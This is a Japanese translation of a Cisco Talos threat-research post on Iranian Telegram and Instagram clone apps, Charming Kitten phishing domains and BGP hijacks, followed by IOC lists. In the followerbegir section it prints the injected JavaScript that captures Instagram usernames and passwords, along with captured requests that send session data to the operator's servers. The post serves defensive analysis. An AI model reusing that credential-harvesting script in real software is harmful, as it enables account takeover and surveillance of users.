はじめに
国家に支援されている攻撃者は、さまざまな多くのテクニックを駆使して、ソーシャル メディアや安全なメッセージング アプリケーションへのアクセス権をリモートから取得しています。Cisco Talos は、2017 年から 2018 年までにユーザへの攻撃およびユーザの秘密情報を盗むために使用されたさまざまなテクニックを確認しました。これらのテクニックでは、偽のログイン ページ、正当なアプリを装った悪意のあるアプリケーション、BGP ハイジャックが使用され、特に安全なメッセージング アプリケーションである Telegram とソーシャル メディア サイト Instagram のイラン人ユーザが標的とされました。
Telegram は推定 4,000 万人のユーザに使用されているため、イランのグレーウェアにとって格好の標的になっています。通常は日常のコミュニケーションに使用される Telegram ですが、過去には抗議団体によってイラン政府へのデモ(特に 2017 年 12 月のデモ)を組織するためにも使用されました。イラン政府が Telegram に対して「暴力を促進」する特定のチャネルの停止を要求したこともあります。この投稿で説明するテクニックは、Telegram および Instagram のユーザに関する情報を収集するために 2017 年から使用されています。複雑さ、リソース、手法は、キャンペーンによって異なります。以下に、ネットワーク攻撃、アプリケーションのクローン、典型的なフィッシングの例の概要を示します。私たちは、個人情報やログイン情報を盗むために、これらのキャンペーンを使用して Telegram アプリケーションのイラン人ユーザが狙われたと考えています。
このような Telegram 「クローン」の一部は、モバイル デバイスにインストールされると、デバイスのユーザが正当な Telegram アプリケーションのユーザであるとしても、デバイスの完全な連絡先リストとメッセージにアクセスできます。偽の Instagram アプリケーションのケースでは、悪意のあるソフトウェアがバックエンド サーバに完全なセッション データを送信します。これにより攻撃者は、使用中のアカウントを完全に制御できるようになります。私たちは、確信を持ってこれらのアプリケーションを「グレーウェア」として分類すべきであると断言します。グレーウェアは、マルウェアとして分類されるほど悪意があるわけではありませんが、望ましくないプログラム(PUP)とみなせる疑わしさがあります。通常この種のソフトウェアは、ユーザに期待される機能(メッセージの送信など)を実行できるため、検出が困難です。この種のソフトウェアがセキュリティ研究者に検出されるのは、別の場所に影響が発生した場合しかありません。私たちの場合も、広範なキャンペーンで使用される可能性のあるソフトウェアをなんとか発見することができました。Talos は、このグレーウェアがこれらのアプリケーションのモバイル ユーザのプライバシーとセキュリティを低下させる可能性があると考えています。Talos の調査で、これらのアプリケーションの一部がホスト サーバにデータを戻すことや、デバイスがイラン国外にある場合でもイラン国内の IP アドレスから何らかの方法で制御されていることが判明しました。
イランの攻撃で見られた別の手法は、偽のログイン ページの作成でした。これは高度なテクニックではありませんが、必要なサイバーセキュリティの知識がないユーザに対しては有効です。「Charming Kitten」などのイランと関連があるグループは、安全なメッセージング アプリケーションを標的とする際、長期にわたってこのテクニックを使用しています。一部の攻撃者は、デバイスの BGP プロトコルのハイジャックを行っています。この手法ではすべてのルータのトラフィックがリダイレクトされますが、デバイスがその新しい経路の提供元を考慮することはありません。BGP ハイジャックを行うには、インターネット サービス プロバイダー(ISP)からの何らかの支援が必要になります。BGP ハイジャックは検出も容易なので、新しい経路が長期間維保持されることはありません。
Talos では、確認した複数の攻撃同士に強固な関連性を発見していませんが、これらの攻撃はすべてイラン、イラン国民、そして Telegram アプリケーションを標的としています。この記事の焦点はイランですが、国家に支援されているかどうかを問わず、あらゆる国の攻撃者によってこれらのテクニックが使用されうることを世界中のユーザが認識しなければなりません。特に普及しているのは、Telegram のようなアプリケーションが禁止されていることから Telegram のサービスを再現するためにクローンが作成され、公式および非公式のアプリ ストアで提供されている、イランやロシアなどの国です。
BGP ハイジャックに対しては、通常のユーザは何も手立てがありませんが、公式アプリ ストアで提供されている正当なアプリケーションを使用することでリスクは軽減できます。クローン アプリケーションにも同じことが言えます。ユーザは、信頼できないソースから入手したアプリケーションのインストールにはある程度のリスクが伴うことを認識しておかなければなりません。いずれのケースでも、非公式の「機能が強化された」アプリケーションは、公式の Google Play ストアで入手可能であっても、リスクが大幅に高くなります。
戦術
機能が強化されたアプリケーション(グレー アプリケーション)
andromedaa.ir と Cambridge Universal Academy
andromedaa.ir の説明
Talos は、完全にイラン市場に焦点を当てたソフトウェア開発者を特定しました。この発行者は、iOS および Android 両プラットフォームで「andromedaa.ir」という名前を使用しています。そして、Instagram などのソーシャル メディア ネットワーク上におけるユーザの露出を増やすことや、特定の Telegram チャネル上のイラン人ユーザ数を増やすことを目的とするソフトウェアを開発しています。
開発者の Web サイト、特にそのインストール リンクを見ると、どのアプリケーションも公式アプリ ストア(Google または Apple)に公開されていないことは明らかです。これは米国政府がイランに科している制裁が原因と考えられます。
andromedaa.ir の whois 情報
andromedaa.ir ドメインは、電子メール アドレス h0mayun@outlook.com とともに登録されています。このアドレスは、Instagram および Telegram のクローン アプリケーション用の他のドメインの登録にも使用されています(以下の別のセクションを参照)。
Talos は、ドメイン andromedaa[.]com と関連する whois 情報の分析後にさまざまなドメインを特定しましたが、1 つを除きすべてが同じ電話番号で登録されていました。
見つかったドメインのリストの一部
上記のドメインに関連する IP アドレスのスキャンを実行すると、SSL 証明書の使用のパターンが判明しました。
証明書情報
この SSL 証明書の分析によって、新たなドメイン flbgr[.]com が明らかになりましたが、その whois 情報はプライバシー保護されていました。SSL 証明書でこれらの値の普及率が低い点に基づいて、Talos は確信を持ってこのドメインを同一の攻撃者に関連付けました。ドメイン flbgr[.]com は 2018 年 8 月 6 日に登録されました。これは一番新しい登録ドメインで、IP アドレス 145.239.65[.]25 に解決されます。Cisco Farsight のデータは、他のドメインもこれと同じ IP アドレスに解決されることを示しています。
同じ IP アドレスに関連付けられているドメインのリスト
次に Talos は、コモン ネーム「followerbegir[.]ir」で SHA-256 フィンガープリントが含まれる SSL 証明書を発見しました。特徴が非常に類似する別の証明書も発見しましたが、 2 つの誤字があるようでした。ひとつはコモン ネーム フィールドの「followbeg.ir」、もうひとつは組織フィールドで、「andromedaa」ではなく「andromeda」となっていました。
証明書情報
Cambridge Universal Academy の説明
andromedaa.ir は iOS アプリケーションを公開していますが、署名には Cambridge Universal Academy Ltd 向けに発行された証明書が使用されています。Cambridge Universal Academy は、イングランドとウェールズに登録されている iOS 開発サービスを提供する会社です。この会社は、4 つの異なる国(イングランド、米国、トルコ、エストニア)で少なくとも 4 つの別の会社を所有するイラン人によって所有されています。これらの企業はすべて同じサービスを共有し、コンテンツが類似する Web ページを提供しています。
Google は、URL「mohajer.co.uk」をフィッシング サイトとして警告しました。この警告は、このサイトが Mohajer.eu とともに、英国、米国、カナダ、オーストラリア、欧州経済領域(EEA)のその他の国に査証サービスを提供している事実と関連している可能性があります。
ビジネス モデル
andromedaa.ir が提供するすべてのアプリケーションは、「いいね」、コメント、フォロワー数、さらには特定の Telegram チャネルのユーザ数を増やすことによって、Instagram や Telegram でのユーザの露出を増やすことを目的としています。これらすべてのサービスでは、こうしたアクションがイラン人ユーザによってのみ実行されることが保証されています。このオペレータは、同じような露出を販売する lik3.org のようなサイトも管理しています(前のセクションを参照)。
料金表(元の HTML エラーはそのまま、翻訳は google.com による)
これらのサービスは違法ではありませんが、「グレー」サービスであることは間違いありません。同じサイトで、他のサービスではなくこのサービスを使用するメリットを強調する宣伝も確認できます。
lik3.org マーケティング(翻訳は google.com による)
このページ内で、顧客に Instagram のパスワードを尋ねないことや、すべてのユーザが本物であると宣伝されていることは注目に値します。実際には、Instagram ユーザは投稿に「いいね」するために該当ユーザのアカウントにログインする必要はないため、オペレータには顧客の Instagram のパスワードは必要ありません。
それどころか、このオペレータは何千ものユーザ セッションにアクセスできます。この「無償」アプリケーションをインストールしたすべてのユーザへのアクセスを得られるため、ユーザ セッション中にやりたいことを何でも実行できます。このオペレータは Telegram アプリケーションに対しては異なる手法を使用していますが、これらの手法によってセッションが完全にテイクオーバーされる可能性もあります。詳細については、「アプリケーションの例」セクションを参照してください。
ここで危険なのは、このオペレータが収益を獲得できることではなく、ユーザのプライバシーがリスクにさらされることです。Instagram および Telegram アカウントに対して使用された同じ手法によって、Telegram のユーザの完全な連絡先リストと今後のメッセージ、そしてユーザの完全な Instagram プロファイルへのアクセスがこのオペレータに提供されるのです。イランでは、このようなサイト、特に Telegram のサイトの使用が禁止されています。チャットが暗号化され、政府によるアクセスが不能になるためです。これらの手法を使用することで、オペレータはエンドポイントを侵害して、今後のすべてのチャットにアクセスすることができます。
バックエンドのほとんどはヨーロッパでホストされていますが、テスト済みアプリケーションはすべて、イラン国内のサーバに対して更新のチェックを実行します。そのこと自体は本質的に悪質ではありませんが、このアプリケーションがイラン国内で禁止されていることを考えると、国内で更新チェックを行うことによって、イラン政府に何千台ものモバイル デバイスへの単一のアクセス ポイントを提供することになるかもしれません。ただし、Talos はこのオペレータと(イランかその他の国かを問わず)あらゆる政府機関との直接的な関係を特定することはできませんでした。
アプリケーションの例
Follower Begir Instagram iOS アプリケーション
私たちが最初に分析したアプリケーションは、iOS 向けに設計されたفالوئر بگیر اینستاگرام(「Follower Begir Instagram」)でした。このアプリケーションは andromedaa.ir によって公開され、Cambridge Universal Academy によって署名されています。このアプリケーションは Instagram に重なって表示されます。
ログイン後の最初の画面
開発者は、このアプリケーションに仮想通貨、ペルシャ言語サポートなど複数の機能を追加しました。
証明書情報
このアプリケーションは、iOS WebKit フレームワークを使用して Web コンテンツを表示(このケースでは Instagram ページを表示)します。最初の実行時に、このアプリケーションには以下の JavaScript スニペットがインジェクトされた Instagram ログイン ページが表示されます。
document.addEventListener(‘click’, function() {
try {
var tu = document.querySelector(‘[name=”username”]’);
var tp = document.querySelector(‘[name=”password”]’);
var tpV = (typeof tp == ‘undefined’) ? ” : tp.value;
var tuV = (typeof tu == ‘undefined’) ? ” : tu.value;
} catch (err) {
var tuV = ”;
var tpV = ”? ? }
var bd = document.getElementsByTagName(‘body’)[0].innerText;
var messageToPost = {
‘pu’: tuV,
‘pp’: tpV,
‘bd’: bd
}; window.webkit.messageHandlers.buttonClicked.postMessage(messageToPost);}, false);
このコードの目的は、ユーザが [接続(Connection)] ボタンをクリックしたときに、この iOS アプリケーションに制御権を提供することです。このアプリケーションは、イベント、ユーザ名およびパスワード フィールドの値とページの本文を受信します。このイベントは、followerbegir.AuthorizationUserController userController:didReceiveScriptMessage() 関数によって処理されます。その後このアプリケーションは Instagram のサーバ上で認証されます。
今回の調査で私たちは、パスワードがバックエンド サーバ(v1[.]flbgr[.]com)に直接送信されないことを突き止めました。以下に、ping.php Web ページに送信されたデータを示します:
POST /users/ping.php?m=ios&access=[redacted]&apk=35&imei=[redacted]&user_details=[redacted]&tokenNumber=[redacted]?HTTP/1.1
Host: v1.flbgr.com
SESSIONID:?[redacted]?
HEADER: vf1IOS: 3361ba9ec3480bcd3766e07cf6b4068a
Connection: close
Accept: */*
Accept-Language: fr-fr
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Accept-Encoding: gzip, deflate
Content-Length: 0
バックエンド サーバのオペレータは、アカウントがプライベートの場合、モバイル タイプ(iOS)、トークンとユーザのデータ(ユーザ名、プロファイル画像、フル ネームなど)を受信します。
SESSIONID 変数には最も機密性が高い情報、つまり Instagram 接続ヘッダと有効なクッキーが含まれます。サーバの所有者は、このフィールドで入手可能な情報を使用して、ユーザの Instagram セッションをハイジャックすることができます。
このアプリケーションには、インフラストラクチャの大部分とは異なり、イラン国外ベースの更新メカニズムがあります。このアプリケーションは、起動するとアプリケーションの現在のバージョンを含む要求を ndrm[.]ir に送信します。
POST /start/fl.php?apk=35&m=ios HTTP/1.1
Host: ndrm.ir
HEADER: vf1
Connection: close
IOS: 3361ba9ec3480bcd3766e07cf6b4068a
Accept: */*
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Content-Length: 0
バージョンが最新でない場合、このアプリケーションは、andromedaa ストアにユーザをリダイレクトします。
開発者の証明書を信頼する手順
このストアは、このアプリケーションの最新バージョンと、前述の開発者の証明書を信頼するための手順を提供します。したがって開発者は、任意の時点で証明書の信頼とアプリケーションの両方を更新することができます。
Ozvbegir(ozvdarozv)アプリケーション
Ozvbegir アプリケーションの目的は、ユーザの Telegram チャネルのメンバー数を増やすことです。このアプリケーションは、イラン人ユーザのみをメンバーとして増やすことを保証するとうたっています。
アプリケーションの説明(Google による翻訳)
私たちはこのアプリケーションの Android バージョンを分析しました。アプリケーション パッケージは、3014 年まで有効な自己署名証明書によって署名されています。
最新の Ozvbegir 証明書
このアプリケーションの以前のバージョンも自己署名証明書を使用しますが、発行者とサブジェクト情報の両方が明らかに偽造されていました。
古いバージョンの証明書
前述のアプリケーションと同様、Ozvbegir は再パッケージ化されたアプリケーションで、Telegram アプリケーションのオリジナルのクラスが含まれています。
Ozvbegir クラスの構造
実際私たちは、マニフェストの中に、このパッケージが Telegram のオリジナルのパッケージであり、アプリケーション コードに適合するように変更されたことを示す兆候を発見しました。マニフェストで使用されていた名前とラベルは、Telegram のオリジナル アプリケーションへの複数の参照が含まれており、Android Maps に使用される API キーも同じに維持されていました。
更新のチェックと応答
前述のアプリケーションと同様に、このアプリケーションも ndrm.ir ドメインへの HTTP 要求を実行することで新しいバージョンを確認します。最新バージョンでない場合、このアプリケーションは最新のバージョンを取得するためのメッセージとリンクを受信します。その内容はオペレータが自由に決定できます。このケースではイランの Android アプリ ストア、cafebazaar.ir からのものでした。
ドメイン ndrm.ir は、他のすべてのアプリケーションの基盤ドメインと同じ電子メール アドレスを使用して登録されています。ただし、このアプリケーションは唯一実際にイラン国内でホストされており、モバイル デバイス上でアプリケーション自体をアップグレードできる機能も備えていました。
このアプリケーションの外観は、オリジナルの Telegram アプリケーションにとてもよく似ています。オリジナルの Telegram アプリケーションのように、ユーザは最初にアプリケーションを開くと、登録のために Telegram に電話番号を提供するように要求されます。
電話番号の要求
この登録によって同一デバイスのシャドー セッションが作成され、このアプリケーションに対して完全な連絡先リストと今後のメッセージに対するアクセスが与えられます。
1 台のモバイル フォン上に作成されたセッション
このアプリケーションは、登録プロセスが完了するとバックエンド サーバに接続し、ユーザとモバイル デバイスに関する情報を提供します。
GET /users/ping.php?access_hash=[redacted]&inactive=0&flags=1107&last_name=%21%21empty%21%21&phone=[redacted]&tg_id=[redacted]&m=d&user_name=[redacted]&first_name=Pr2&network=SYMA&country=[redacted]&apk=570&imei=[redacted]&brand=motorola&api=24&version=7.0&model=Moto+G+%285%29&tut=[redacted] HTTP/1.1
TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1
NUM: df27340104277f1e73142224d9cb59e8
HEADER: bt6
ADMIN: web
Host: v1.ozvdarozv.com
Connection: close
User-Agent: Apache-HttpClient/4.5.1 (java 1.4)
私たちは、このアプリケーションを最初に開いたときに自動的に Telegram チャネルに参加したサブスクライバが 100 万人以上いることを特定しました。
チャネル情報
Bitgram_dev
Bitgram_dev は、前述の開発者とは違い、インターネット上に大規模な痕跡を残していません。現在は、AseGram と BitGram の 2 つのアプリケーションを Google Play に公開しています。9 月初めから 10 月初めまで入手可能だったこのアプリケーションは、約 10,000 回ダウンロードされました。
Google Play での AseGram と BitGram
発行者情報
AseGram と BitGram の目的がイラン政府による Telegram の使用禁止を免れることだとすると、発行者が自衛目的で痕跡を小さく抑えたいと考えるのは当然です。
アプリケーションの例
AseGram
AseGram アプリケーションは、特定の国では Google Play ストアで入手できます。このアプリケーションは Google Play ストアからダウンロードしたものですが、パッケージに署名している証明書はセキュリティ面でまったく役に立ちません。
AseGram の証明書
この Telegram クローンが、ユーザからのすべての通信を傍受するために作成されたことは明らかです。ただしこのアプリケーションは、他のアプリケーションとは異なるアプローチをとっており、トラフィックを傍受するために Telegram パッケージ レイヤに定義されているプロキシを使用します。
プロキシ コードの設定
前述のアプリケーションと同様に、AseGram は正当な Android 向け Telegram を再パッケージ化したものです。このテクニックを使用することで、開発者は独自の Telegram クライアントの実装を試みるときに遭遇しうるすべての問題を回避できます。
アプリケーションの起動時に、サービス org.pouyadr.Service.MyService が開始されます。このサービスは、オリジナルの Telegram パッケージから MessagesController.getGlobalMainSettings() を呼び出し、設定を変更してプロキシ構成を含めます。
設定の詳細はマルウェアにハードコードされ、パッケージ固有の値と連結されたハードコード値から抽出した鍵を使用して AES で暗号化されます。
このアプリケーションは、talagram.ir、hotgram.ir、および harsobh.com の 3 つのドメインに接続します。これらのドメインはすべてイランの企業に登録されています。このケースでは、アプリケーション管理者が通信にアクセスできます。
このアプリケーションは、アプリケーションを終了するだけでは無効化できないサービスを作成し、デバイスのブート時に起動します。このサービスには、新しいパッケージをインストールするために必要なコードが含まれていますが、このアクションはシステム内の標準パッケージ マネージャによって処理されます。このサービスは、イラン国内の IP アドレスと連絡する役割も果たします。実は、このサービスは「Advanced Telegram」(または Golden Telegram)と呼ばれる Telegram クローンのバックエンドを使用します。このアプリケーションは cafebazaa.ir というイラン政府公認 Android アプリ ストアで入手できます。
Advanced Telegram cafebazaar ページ(Google による翻訳)
このページの最初の説明文が「این برنامه در چارچوب قوانین کشور فعالیت میکند」(このプログラムはこの国の法律の枠組み内で動作します)であることにまず注目する必要があります。禁止を免れようとするアプリケーションが、禁止を課した国に管理されているクローン アプリケーションと同じサーバに接続する場合の正当なユース ケースを見つけるのは難しいため、これらの通信は非常に疑わしいと考えざるを得ません。
このアプリケーションには、禁止を免れるために使用可能な、複数の国に設置されている Socks サーバを使用するためのコードも含まれています。ただし、私たちの調査中にはこれらのサーバの使用は確認できませんでした。一方で、物理デバイスがイラン国内にない場合でも、トラフィックがイランのサーバに送信されることが確認されました。このことは、イランでの Telegram の禁止を免れようとしているアプリケーションにとって矛盾しているように思われます。
偽の Web サイト
スプーフィングされた Telegram Web サイト
エンド ユーザの Telegram アカウントへのアクセス取得の最も簡単なアプローチは、ソーシャル エンジニアリングによって、攻撃者が管理する不正な Web サイトにユーザを誘導し、ユーザ名とパスワードを入力させることです。私たちは、Telegram のログイン ページを模倣したドメイン youtubee-videos[.]com を実際に確認しました。
偽の Telegram ログイン ページ
このドメインは 2017 年 7 月 25 日に登録されました。戦術、テクニック、手順(TTP)に基づくと、ドメイン登録パターン、このドメインおよび他のドメインの登録に使用された電子メールアドレス(nami.rosoki@gmail[.]com)、パッシブ ドメイン名サーバ(pDNS)レコードは、このドメインが Charming Kitten グループと関連していることを示唆しています。このドメインは、別件で別のサイバーセキュリティ会社 Clearsky によって Charming Kitten と関連付けられています。この Web ページのソース コードをさらに詳しく調査すると、
この Web サイトは 「Webogram」 と呼ばれる GitHub プロジェクト?を使用して設計されているようでした。ソース ページには、この Web サイトの表示が iPhone 向けであることを示す文字列もありました。
ソース コード、GitHub.com への参照
新たに確認された Charming Kitten ドメイン
Talos は、攻撃者グループ Charming Kitten によって使用された偽の Telegram Web サイトの調査中に、「mobile」、「messenger」、「hangouts」といったキーワードを含む他の悪意のあるドメインを多数発見しました。いくつか見つかった「hangouts」は、Hangouts と呼ばれる Google チャット アプリケーションを指しているようです。このことは、Charming Kitten の攻撃者がエンド ユーザのモバイル デバイス、特にそのチャット メッセージへのアクセスの取得に長い間関心を寄せていたことを示唆しています。
これらのドメインも、Charming Kitten グループ関連の他のすべてのドメインのように、同じ手口を使用して 2017 年に登録されていました。Talos は pDNS レコードの分析を通じて、同一の IP アドレスに解決される追加のドメインを発見しました。
これにより、Charming Kitten グループがユーザ クレデンシャルとメッセージング アプリケーションに重点を置いたアクティビティを継続的に行っていることが実証されました。
BGP ルーティングの異常
背景
Talos は BGPStream(シスコの Border Gateway Protocol(BGP)データベースのアナウンス)の監視中に、イランベースの自律システム番号(ASN)58224 からのルーティング異常に気付きました。BGP プロトコルに馴染みのない方のために説明すると、BGP は Request for Comments(RFC)4271 に「自律システム間ルーティング プロトコル」として定義されています。このコンテキストでは、経路は宛先と宛先へのパス属性を組み合わせた情報単位として定義されます。つまりこのプロトコルによって、要求元のネットワークまたは自律システムの外部に位置するリソースを要求する際に、インターネット通信を行うことが可能になります。
BGP は、ルーティングのベスト パス選定を支援するためにインターネット全体で使用されます。ベスト パスの選定は、BGP による経路選定を可能にするさまざまな要因によって、ISP レベルで制御可能であることに注意してください。BGP は、スピーキング システムを通じてインターネット トラフィックのルーティングを最適化します。スピーキング システムは、RFC 4271 に次のように定義されています。
BGP スピーキング システムの主な機能は、ネットワークの到達可能性情報を他の BGP システムと交換することです。このネットワークの到達可能性情報には、到達可能性情報が通過する自律システム(AS)リストの情報が含まれています。
これらのスピーキング システムは、ルータが隣接システムに「更新メッセージ」を送信するためのプラットフォームとして機能します。経路の属性を変更するプロセスは、代替経路をアドバタイズすることによって行われます。代替経路の情報には、新しい [変更された] 属性と、元の経路と同じアドレス プレフィックスが含まれます。
この機能はネットワーキングの問題に対処するために設計されましたが、悪用を防止するための十分なセキュリティ メカニズムは追加されませんでした。BGP は、ネイバー向けの MD5 パスワード、IPSec、GTSM などの一部の方法を除き、セキュリティのメカニズムを提供しません。これらの機能はいずれもデフォルトの要件ではないため、幅広く使用されているとは限りません。したがって、プライマリ経路に問題がなくても、悪意のある人物が同一のプレフィックスまたは AS への代替経路の更新メッセージを送信できてしまいます。
その結果、トラフィックの一部は、事前に設定された、犠牲者にとって次善の経路を通じて転送される可能性があります。このような経路の逸脱は、BGP ハイジャック セッションと呼ばれることがあります。BGP ハイジャック セッションの有効性は、メッセージを介して更新を受信した BGP ピアの数に基づいて測定されます。更新メッセージを受信したピア数が多いほど、トラフィックが攻撃者に事前に設定された次善の代替経路を介してルーティングされる可能性が高くなります。
事前に計画された ASN 58224 からのルーティング アクティビティ
2018 年 6 月 30 日 7 時 41 分 28 秒(協定世界時)に、興味深い BGP ルーティング異常が発生しました。このイベント中に、イランベースの ASN 58224 がプレフィックス 185.112.156.0/22 の更新をアナウンスしました。イランのテレコム プロバイダーである Iran Telecommunication Company PJS が、この更新メッセージを送信した ASN を所有しています。
ハイジャックされた可能性があるこの範囲は、ハンガリーベースのインターネット サービス プロバイダー(ISP)である DoclerWeb Kft と関連していました。このイベントは 9 つの BGPmon ピアで検出され、新しい更新メッセージが配布されるまで 2 時間 15 分の間続きました。このイベントは非常に小規模でしたが、大規模な BGP ハイジャックを行うための実験であった可能性があります。
そして、同一のイランベースの ASN 58224 に起因するさらに大規模な BGP 異常が発生しました。2018 年 7 月 30 日 6 時 28 分 25 秒(協定世界時)に、最新の「詳細経路」として 4 つの BGP 経路が同時にアナウンスされ、Telegram との通信に影響が発生しました。ルータは、スピーキング システムからのこの更新メッセージを受信すると、ASN 58224 を通じて Telegram サーバ宛の一部のトラフィックのルーティングを開始しました。このキャンペーンは、多数の BGPmon ピアで観察されたため、非常に効果的であったことが実証されました。このキャンペーンはスピーキング システムを介して地域全体に伝搬されたことがうかがえます。1 ヵ月前のイベントと同様に、2 時間 15 分後にすべてのルータが正しい更新メッセージを受信したことで、ハイジャックは終了しました。
BGP ハイジャックで実現したコンピュータ ネットワーク操作
理論的に、このアナウンスには Telegram サーバとの通信を侵害するための 1 つの操作コンポーネントが含まれていた可能性があります。このハイジャック セッションの結果、一部の Telegram メッセージはイランの通信プロバイダーに送信されました。このテクニックは、国家の支援を受けている別の攻撃者によって、マルウェアの配信のために使用されたことがあります。これについては、このハイジャックの 2 ヵ月前の 2018 年 5 月に他のセキュリティ研究者によって文書化されています。目的の ISP を通じてルーティングされたトラフィックは、変更または検査の対象になる可能性があります。あるオープンソースのレポートでは、イランベースの通信プロバイダーが以前にイラン政府の通信傍受要求に協力していたことが示唆されています。この記事には、通信会社が Telegram アカウントへのアクセス権を取得するために必要な Telegram SMS 検証コードを政府関係者に提供したと記述されています。
この機能は非常に魅力的です。この機能を通じて、攻撃者は近隣の ASN を介してイランにトラフィックをルーティングすることができます。また、近隣国のデバイスへのアクセス権を取得し、イラン以外の国の通信プロバイダーを活用しているユーザを侵害することも可能になります。
イランの情報通信技術大臣である Mohammad-Javad Azari Jahromi 氏は、このイベントを認識し、調査を実施すると語りました。しかしイラン政府からは、この調査に関して何も発表されていません。
まとめ
国家に支援されている攻撃者が市民を標的にした監視メカニズムの導入に使用できるのは、ここで説明した 3 つの手法だけではありません。大量のインターネットのファイアウォールと監視の導入というトピックは、過去にもニュースになっています。これらのキャンペーンの一部は、Telegram などの特定のアプリケーションも標的にしています。しかし、一見関連性がなさそうなこれらのイベントはすべて、イランと Telegram という 2 つの特徴を共有しています。イランは国内での Telegram の使用を禁止しているため、この 2 つの要素はかけ離れた関係にあるはずです。しかし私たちは、数千台のデバイスにインストールされ、イラン国内の IP アドレスに何らかの方法で接触している複数の Telegram クローンを確認しています。クローンの一部は、禁止を免れられることを宣伝しています。これらのアプリケーションのアクティビティは違法ではありませんが、オペレータにこのメッセージング アプリケーションの完全な制御権、そしてユーザ デバイスに対するある程度の制御権を提供しています。
Charming Kitten などのグループの長期にわたるアクティビティは、典型的なフィッシング技法を使用していますが、サイバーセキュリティに対してあまり高い意識を持たないユーザにはいまだに有効です。こうしたすべてのアクティビティの共通点は市民です。当然ながらどの国でも、ほとんどの市民はサイバーセキュリティ プロフェッショナルのようなセキュリティ知識を持っていないため、この典型的な技法でも高い効果をあげられるわけです。
7 月 30 日に発生したルーティング更新メッセージの背後の意図を正確に断定することは不可能ですが、Talos はある程度の自信を持って、この更新がこの地域の Telegram ベース サービスを標的とした意図的な行為であると結論付けます。4 つの更新メッセージがまったく同時に配信されることや、2 つの異なる Telegram 範囲が 4 つの異なるサブネットを通じてルーティングされ、そのサブネットがすべて 1 つの ASN(58224)に関連するということはまずありえません。この評価ステートメントでは、Telegram の使用を禁ずる法律の通過や、イランでの Telegram の IP アドレスのブロックが原因で発生したシステム停止のレポートなど、イランと Telegram の複雑な歴史についてのオープンソースのレポートも考慮しています。
被害者とアプリケーション以外に、Talos はこれらのイベント間の強固なリンクを見つけることはできませんでした。この調査は、Telegram が現在使用禁止であることを受け、イランに焦点を当てて実施しました。ただし、これらの手法は、国家支援の有無を問わず、あらゆる悪意のある攻撃者によって使用される可能性があります。Talos は、このブログ投稿で説明したアプリケーションを使用した場合、ユーザのプライバシーがリスクにさらされることを断言します。総合的なセキュリティ上の懸念に対して真剣に取り組むことが急務です。
IOC
ドメイン
talagram[.]ir
hotgram[.]ir
Harsobh[.]com
ndrm[.]ir
andromedaa[.]ir
buycomment[.]ir
bazdiddarbazdid[.]com
youpo[.]st
im9[.]ir
followerbegir[.]ir
buylike[.]ir
buyfollower[.]ir
andromedaa[.]ir
30dn[.]ir
ndrm[.]ir
followerbeg[.]ir
viewmember[.]ir
ozvdarozv[.]ir
ozvbegir[.]ir
obgr[.]ir
likebeg[.]ir
lbgr[.]ir
followgir[.]ir
followbegir[.]ir
fbgr[.]ir
commentbegir[.]ir
cbgr[.]ir
likebegir[.]com
commentbegir[.]com
andromedaa[.]com
ozvbegir[.]com
ozvdarozv[.]com
andromedaa[.]net
lik3[.]org
homayoon[.]info
buylike[.]in
lkbgr[.]com
flbgr[.]com
andromedaa[.]com
mobilecontinue[.]network
mobilecontinue[.]network
mobile-messengerplus[.]network
confirm-identification[.]name
invitation-to-messenger[.]space
com-messengersaccount[.]name
broadcastnews[.]pro
youridentityactivity[.]world
confirm-verification-process[.]systems
sessions-identifier-memberemailid[.]network
mail-profile[.]com
download-drive-share[.]ga
hangouts-talk[.]ga
mail-login-profile[.]com
watch-youtube[.]live
stratup-monitor[.]com
Xn–oogle-v1a[.]ga (?oogle[.]ga)
file-share[.]ga
ハッシュ値
8ecf5161af04d2bf14020500997afa4473f6a137e8f45a99e323fb2157f1c984 – BitGram
24a545778b72132713bd7e0302a650ca9cc69262aa5b9e926633a0e1fc555e98 – AseGram
a2cf315d4d6c6794b680cb0e61afc5d0afb2c8f6b428ba8be560ab91e2e22c0d followerbegir.ipa
a7609b6316b325cc8f98b186d46366e6eefaae101ee6ff660ecc6b9e90146a86 ozvdarozv.apk
本稿は 2018年11月5日に Talos Group のブログに投稿された「Persian Stalker pillages Iranian users of Instagram and Telegram?」の抄訳です。